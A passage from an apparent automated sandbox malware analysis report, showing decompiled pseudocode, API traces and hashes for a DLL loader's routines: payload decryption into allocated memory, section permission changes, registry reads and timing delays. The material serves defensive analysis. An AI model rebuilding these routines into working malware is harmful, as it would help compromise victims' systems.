                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: b1130845fe5629b5bde1784fa429624ac9aa6c9b2604d60db3759918c7a53b5c
                                          • Instruction ID: 335f35d0e0bbb4b37bcbf16cb09ea93b383149604d7ecdbcdb8c8723aaf8e0b8
                                          • Opcode Fuzzy Hash: b1130845fe5629b5bde1784fa429624ac9aa6c9b2604d60db3759918c7a53b5c
                                          • Instruction Fuzzy Hash: C8512471A40215AFDB24EBA4DC85B6E73BCAF08B20F14C465F61EE7191E7709E40EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 373 c76cd3-c76d1d memset call c74814 376 c76e84-c76e86 373->376 377 c76d23-c76d37 lstrlenW StrCmpNIW 373->377 380 c76e87-c76e8f 376->380 378 c76e76-c76e78 377->378 379 c76d3d-c76d4a call c79138 377->379 381 c76e79-c76e82 call c7147e 378->381 386 c76d50-c76d63 call c7a5e9 379->386 387 c76d4c 379->387 381->380 390 c76e64-c76e66 386->390 391 c76d69-c76d85 call c7a5e9 386->391 387->386 393 c76e67-c76e6d 390->393 396 c76d87-c76da8 call c774b9 call c7147e 391->396 397 c76daa-c76dac 391->397 393->381 395 c76e6f-c76e74 call c7568a 393->395 395->381 401 c76dad-c76daf 396->401 397->401 403 c76db5-c76dbc 401->403 404 c76e59-c76e62 call c7147e 401->404 407 c76e01-c76e31 call c76e92 call c76737 403->407 408 c76dbe-c76dd5 call c7a5e9 403->408 404->393 422 c76e33-c76e4e call c772f2 407->422 423 c76e50-c76e54 call c7147e 407->423 415 c76dd7-c76df8 call c774b9 call c7147e 408->415 416 c76dfa-c76dfc 408->416 419 c76dfd-c76dff 415->419 416->419 419->404 419->407 422->423 423->404
                                          C-Code - Quality: 90%
                                          			E00C76CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t5 = _t40 + 0xc7ee24; // 0x410025
                                          				_t90 = E00C74814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E00C7147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E00C79138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E00C7A5E9(0,  *0xc7d33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0xc7d2a4; // 0x24ba5a8
                                          					_t11 = _t52 + 0xc7e81a; // 0x65696c43
                                          					_t55 = E00C7A5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E00C774B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E00C7147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E00C7147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E00C7568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0xc7d260 & 0x00000001) == 0) {
                                          							L14:
                                          							E00C76E92(_t81, _v60, _v56,  *0xc7d270, 0);
                                          							_t81 = E00C76737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E00C772F2( &_v84, 0);
                                          							}
                                          							E00C7147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t18 = _t67 + 0xc7e823; // 0x65696c43
                                          						_t70 = E00C7A5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E00C774B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E00C7147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 00C76CED
                                            • Part of subcall function 00C74814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00C76D15,00410025,00000005,?,00000000), ref: 00C74825
                                            • Part of subcall function 00C74814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00C74842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C76D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C74AB5), ref: 00C76D2F
                                          Strings
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 4dc1ca601fbc2a1ca73773bdff510e17ee73bd8576aa32c09ef8442acd6971e6
                                          • Instruction ID: 05047b28db33c1f0a839bd8794cf2b4bb96c551383c1fdfbb3a75af14e6f5fb1
                                          • Opcode Fuzzy Hash: 4dc1ca601fbc2a1ca73773bdff510e17ee73bd8576aa32c09ef8442acd6971e6
                                          • Instruction Fuzzy Hash: 2D41AD72208745AFC710AFA5DC81EAFB7ECAF88704F04892AB99DD7111D670DD049BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 00C75057
                                          • SysAllocString.OLEAUT32(00C7A6F4), ref: 00C7509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C750AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C750BD
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 1c79cc5c8442053795aaafff27ca3a1e8f63fc319657bd8526cbc418ecdff4ef
                                          • Instruction ID: b25175711bc3f01929dee43c12373c82a2173dbbc1be1b93ad686354adbaa83f
                                          • Opcode Fuzzy Hash: 1c79cc5c8442053795aaafff27ca3a1e8f63fc319657bd8526cbc418ecdff4ef
                                          • Instruction Fuzzy Hash: DC31F176900609EFCB05DF98D8C49EE7BB9FF48300B10845EF90A9B251E7719A81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E005F1B6F(void* __edi, intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				unsigned int _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr* _v36;
                                          				void* _v40;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				intOrPtr _t42;
                                          				void* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed int _t61;
                                          				intOrPtr _t78;
                                          				void* _t79;
                                          
                                          				_t78 =  *0x5f4130;
                                          				_t42 = E005F1C8A(_t78,  &_v24,  &_v16);
                                          				_v20 = _t42;
                                          				if(_t42 == 0) {
                                          					asm("sbb ebx, ebx");
                                          					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                          					_t79 = _t78 + _v24;
                                          					_v40 = _t79;
                                          					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                          					_v28 = _t49;
                                          					if(_t49 == 0) {
                                          						_v20 = 8;
                                          					} else {
                                          						_v8 = _v8 & 0x00000000;
                                          						if(_t61 <= 0) {
                                          							_t50 =  *0x5f4140;
                                          						} else {
                                          							_t53 = _t49 - _t79;
                                          							_v32 = _t53;
                                          							_v36 = _t53 + _a4 + 0x5f51a2;
                                          							_v12 = _t79;
                                          							while(1) {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("rol edx, cl");
                                          								E005F1908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                          								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                          								_v8 = _v8 + 1;
                                          								_v12 = _v12 + 0x1000;
                                          								 *0x5f4140 = _t50;
                                          								if(_v8 >= _t61) {
                                          									break;
                                          								}
                                          								_t53 = _v32;
                                          							}
                                          						}
                                          						if(_t50 != 0x59935a40) {
                                          							_v20 = 0xc;
                                          						} else {
                                          							memcpy(_v40, _v28, _v16);
                                          						}
                                          						VirtualFree(_v28, 0, 0x8000); // executed
                                          					}
                                          				}
                                          				return _v20;
                                          			}






















                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 005F1BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005F11FF,-00000008), ref: 005F1C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005F1C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          • Opcode ID: cf567e70921d4d9a23f4aab68fcba6521c1bf68c1b7b6542b104615728c6c742
                                          • Instruction ID: 3ade666f7c607f070aa0109c52fb079511ae6a558e3c799611b879e36ce4ec46
                                          • Opcode Fuzzy Hash: cf567e70921d4d9a23f4aab68fcba6521c1bf68c1b7b6542b104615728c6c742
                                          • Instruction Fuzzy Hash: 0B315971D4061EEBDB01CF98D885BFEBBB8BF58300F108165EA01BB250D779AA05DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00C71295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0; // executed
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E00C758BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 793069f7cf250319447b05974c4738b6ea1e6fda6362cd7ce98a2ae605006c6a
                                          • Instruction ID: e96b79f14822d460f8eecb2b8c899a4164e918f9fd8ced4287140f737163ccb3
                                          • Opcode Fuzzy Hash: 793069f7cf250319447b05974c4738b6ea1e6fda6362cd7ce98a2ae605006c6a
                                          • Instruction Fuzzy Hash: 57214F7590120AEFDB11DFA8D9849DEBBB8FF48304B148169ED19E7220EB70DA41DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C790A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0xc7d238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0xc7d1a8 = GetTickCount();
                                          				_t7 = E00C76A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E00C71C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E00C79511(_t15) != 0) {
                                          						 *0xc7d260 = 1; // executed
                                          					}
                                          					_t13 = E00C74908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,00C76F11,?), ref: 00C790AA
                                          • GetTickCount.KERNEL32 ref: 00C790BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 00C790D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 00C790F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 634ce0dce22c2761bd4ef041d0586dd9fcfc86e88b123b31f348752e1a2e029d
                                          • Instruction ID: 492adf615dc1ac0c42335209a71fae324c0496efc30418e01bac79533d1a578c
                                          • Opcode Fuzzy Hash: 634ce0dce22c2761bd4ef041d0586dd9fcfc86e88b123b31f348752e1a2e029d
                                          • Instruction Fuzzy Hash: E8F0F631640302ABD7106B749C89B4E36B4FF44395F00C025F80DD7261EB30C881D6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C768CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				void* _t40;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E00C79138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t4 = _t24 + 0xc7ede0; // 0x3139388
                                          				_t5 = _t24 + 0xc7ed88; // 0x4f0053
                                          				_t26 = E00C71B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t11 = _t32 + 0xc7edd4; // 0x313937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0xc7ed88; // 0x4f0053
                                          						_t51 = E00C75FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0xc7d2a4; // 0x24ba5a8
                                          							_t13 = _t35 + 0xc7ea59; // 0x30314549
                                          							if(E00C775E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0xc7d25c - 6;
                                          								if( *0xc7d25c <= 6) {
                                          									_t42 =  *0xc7d2a4; // 0x24ba5a8
                                          									_t15 = _t42 + 0xc7ec3a; // 0x52384549
                                          									E00C775E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0xc7d2a4; // 0x24ba5a8
                                          							_t17 = _t38 + 0xc7ee18; // 0x31393c0
                                          							_t18 = _t38 + 0xc7edf0; // 0x680043
                                          							_t40 = E00C71BC1(_v8, 0x80000001, _t51, _t18, _t17); // executed
                                          							_t45 = _t40;
                                          							HeapFree( *0xc7d238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0xc7d238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E00C7568A(_t53);
                                          				}
                                          				return _t45;
                                          			}



















                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03139388,00000000,?,7519F710,00000000,7519F730), ref: 00C7691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031393C0,?,00000000,30314549,00000014,004F0053,0313937C), ref: 00C769BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C79C10), ref: 00C769CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 9971ab774e346ef473075de076f743330b8f700d00f4a1575aefd16f5fd35bb1
                                          • Instruction ID: 545dba2106ecabdb00fa9d9f9342a4ef8f760a731195005d17476e3032e2a832
                                          • Opcode Fuzzy Hash: 9971ab774e346ef473075de076f743330b8f700d00f4a1575aefd16f5fd35bb1
                                          • Instruction Fuzzy Hash: FA318F32A00109AFDB21EBA4DC85FAE7BBCEF48744F0540A5B60DAB121D7709E45EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00C79F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t26;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0xc7d2a4; // 0x24ba5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0xc7d238);
                                          				_t1 = _t43 + 0xc7e791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0xc7d24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0xc7d24c =  *0xc7d24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E00C77CF7(_a4, _t41); // executed
                                          						_t19 = E00C760CF(_t41, _t41, _t46); // executed
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0xc7d24c < 5) {
                                          								 *0xc7d24c =  *0xc7d24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E00C76106();
                                          						RtlFreeHeap( *0xc7d238, 0, _t41); // executed
                                          						goto L10;
                                          					}
                                          					_t25 = E00C7514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				_t26 = RtlAllocateHeap(); // executed
                                          				if(_t26 == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E00C71754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}














                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C79F3B
                                            • Part of subcall function 00C71754: GetTickCount.KERNEL32 ref: 00C71768
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C717B8
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C717D5
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C71801
                                            • Part of subcall function 00C71754: HeapFree.KERNEL32(00000000,?), ref: 00C71813
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C71834
                                            • Part of subcall function 00C71754: HeapFree.KERNEL32(00000000,?), ref: 00C71844
                                            • Part of subcall function 00C71754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C71872
                                            • Part of subcall function 00C71754: GetTickCount.KERNEL32 ref: 00C71883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C79F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,00C79C62,00000002,?,?,?,?), ref: 00C79FB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 1943b04170b1ee7a831c9ccc6f9a5d110f858164e8000ae843a81eb62f58f747
                                          • Instruction ID: 6714b747cb06ca04340a55aab03c79489b757d32ec6c96cc32edeec615e2cb43
                                          • Opcode Fuzzy Hash: 1943b04170b1ee7a831c9ccc6f9a5d110f858164e8000ae843a81eb62f58f747
                                          • Instruction Fuzzy Hash: EC215C72200205EBCB119FA9DC40B9E37BCEF49345F108015F90AD7261DB70EE869BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E005F1EB4(void* __eax, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				long _v16;
                                          				signed int _v20;
                                          				signed int _t31;
                                          				long _t33;
                                          				int _t34;
                                          				signed int _t35;
                                          				signed int _t42;
                                          				void* _t50;
                                          				void* _t51;
                                          				signed int _t54;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t42 =  *(__eax + 6) & 0x0000ffff;
                                          				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                          				_v20 = _t42;
                                          				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                          				_v8 = _v8 & 0x00000000;
                                          				if(_t42 <= 0) {
                                          					L11:
                                          					return _v12;
                                          				}
                                          				_t51 = _t50 + 0x24;
                                          				while(1) {
                                          					_t54 = _v12;
                                          					if(_t54 != 0) {
                                          						goto L11;
                                          					}
                                          					asm("bt dword [esi], 0x1d");
                                          					if(_t54 >= 0) {
                                          						asm("bt dword [esi], 0x1e");
                                          						if(__eflags >= 0) {
                                          							_t33 = 4;
                                          						} else {
                                          							asm("bt dword [esi], 0x1f");
                                          							_t35 = 0;
                                          							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                          						}
                                          					} else {
                                          						asm("bt dword [esi], 0x1f");
                                          						asm("sbb eax, eax");
                                          						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                          					}
                                          					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                          					if(_t34 == 0) {
                                          						_v12 = GetLastError();
                                          					}
                                          					_t51 = _t51 + 0x28;
                                          					_v8 = _v8 + 1;
                                          					_t31 = _v8;
                                          					if(_t31 < _v20) {
                                          						continue;
                                          					} else {
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L11;
                                          			}
















                                          APIs
                                          • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 005F1EE2
                                          • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 005F1F3A
                                          • GetLastError.KERNEL32 ref: 005F1F40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: d5242885fc0e3101a9495d3b65d7757ab847984f031cc33576a0a2b63d30ff54
                                          • Instruction ID: 02814c5e45530ba1c629e95c0080ecf1a42b097e9d242d7f8669135cf099f396
                                          • Opcode Fuzzy Hash: d5242885fc0e3101a9495d3b65d7757ab847984f031cc33576a0a2b63d30ff54
                                          • Instruction Fuzzy Hash: CB21C07290020DEFEB20CF94CC80EBDBBB8FF14314F200559E6409B142D3789A88DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005F16E4() {
                                          				char _v16;
                                          				intOrPtr _v28;
                                          				void _v32;
                                          				void* _v36;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          				long _t25;
                                          				int _t26;
                                          				intOrPtr _t30;
                                          				void* _t32;
                                          				signed int _t35;
                                          				intOrPtr* _t37;
                                          				intOrPtr _t39;
                                          				int _t44;
                                          
                                          				_t15 =  *0x5f4144;
                                          				if( *0x5f412c > 5) {
                                          					_t16 = _t15 + 0x5f50f4;
                                          				} else {
                                          					_t16 = _t15 + 0x5f50b1;
                                          				}
                                          				E005F1000(_t16, _t16);
                                          				_t35 = 6;
                                          				memset( &_v32, 0, _t35 << 2);
                                          				if(E005F1D86( &_v32,  &_v16,  *0x5f4140 ^ 0xc786104c) == 0) {
                                          					_t25 = 0xb;
                                          				} else {
                                          					_t26 = lstrlenW( *0x5f4138);
                                          					_t8 = _t26 + 2; // 0x2
                                          					_t44 = _t26 + _t8;
                                          					_t11 = _t44 + 8; // 0xa
                                          					_t30 = E005F10FC(_t39, _t11,  &_v32,  &_v36); // executed
